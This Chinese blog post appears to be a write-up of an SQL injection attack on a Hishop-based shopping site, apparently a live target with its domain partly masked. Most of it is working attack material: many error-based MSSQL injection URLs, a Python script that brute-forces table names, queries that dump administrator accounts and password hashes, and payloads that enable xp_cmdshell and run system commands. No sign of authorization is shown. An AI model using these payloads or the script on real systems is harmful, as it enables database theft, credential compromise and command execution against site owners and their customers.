首页 » NetworkSec » Penetration » 正文

记一次mssql注入历程

0x00 发现

目标使用hishop,查看历史漏洞发现一处注入:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271

 

db_name():xxxshop017
user:xxxx017
@@servername:XXXSHOP
 

0x01 郁闷的爆表名

那就开始爆xxxshop017的表吧

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271


也可以利用information_schema爆表

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);–

×/
写个脚本跑表

#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
	'Cookie': '',
	'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
global tables_name
tables_name = "'Hishop_HelpCategories'"
#print tables_name
def brute_tables(url):
	for i in range(0,300):
		url = 'http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0%20and%20%271%27=%271'
		print url
		rsp = requests.get(url,headers=headers)
		soup = BeautifulSoup(rsp.text,"lxml")
		title = soup.title.string
		#print title
		table_name = re.findall(r"'(.*?)'",title)
		#print table_name[0]
		global tables_name
		tables_name = tables_name + ',\'' + table_name[0] + '\''
		#print tables_name
	print tables_name
def main(url):
	brute_tables(url)
if __name__ == '__main__':
	url = 'http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0%20and%20%271%27=%271'
	main(url)

郁闷开始了,竟然报错了!

经测试,是因为url长度超过2093返回404了,利用burp和chrome都是相同情况,目标系统iis8.5+.net4,在使用相同hishop的另外一个网站(iis7.5)测试不会404……

猜测可能是运维修改了IIS最大url长度,但是可能性非常低!
无奈,利用xml path爆吧
利用xml path()爆所有表

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271

 
由于表名太多,最后出现省略号,无法爆完所有表。

 
那就利用not in分两次爆,把第一次用xml path爆出来的表名加入not in。

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271

 
 

 

0x02 获取列名和数据

判断管理员帐号密码可能在
aspnet_Membersaspnet_Managers这两个表中
先看aspnet_Members

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))–

 

得到帐号admin密码xxx2018@
利用where、not in可以获取多个数据
有些帐号的密码经过了加密(疑似RSA)
<Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt>
再看看aspnet_Managers

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))–

 

密码base16/32/64无法解密
疑似经过了rsa加密。
 
利用admin xxx2018@登录失败。
猜测可能是数据库不对,尝试爆所有数据库。
利用xml paht()爆所有库

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271

 
得到可能存在帐号密码的数据库(域名是mall)
[xxxmall]
尝试跨库查询

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271

没权限。。。。。。
尝试利用存储过程。
开启存储过程

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;EXEC%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;EXEC%20sp_configure%20%27xp_cmdshell%27,%201;RECONFIGURE;–

尝试执行whoami

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;exec%20master..xp_cmdshell%20%22whoami%22;–

尝试列目录

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;execute%20master..xp_dirtree%20%27C:%27;–

黔驴技穷。。。。。。
 

0x03 其他

判断权限
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) //判断是否是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //判断是否是库权限
and 1=(select is_srvrolemember(‘sysadmin’))
 
and 1=(select is_srvrolemember(‘serveradmin’))
 
and 1=(select is_srvrolemember(‘setupadmin’))
 
and 1=(select is_srvrolemember(‘securityadmin’))
 
and 1=(select is_srvrolemember(‘diskadmin’))
 
and 1=(select is_srvrolemember(‘bulkadmin’))
 
sqlmap –privileges

–privileges -U xxx017
判断表是否存在

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(Select%20Count(*)%20from%20Hishop_PaymentaTypes)%3E0%20and%20%271%27=%271

or

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20exists(select%20*%20from%20aspnet_Referralsa)%20and%20%271%27=%271

爆列

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27and%201=CONVERT(INT,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27aspnet_roles%27))--

 
获取数据

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20top%201%20rolename%20from%20aspnet_roles))--
 
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20FOR%20XML%20PATH(%27%27))--
 
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20and%20userid%20not%20in%20(%277448%27)%20FOR%20XML%20PATH(%27%27))--

 
 

Comment

please input captcha *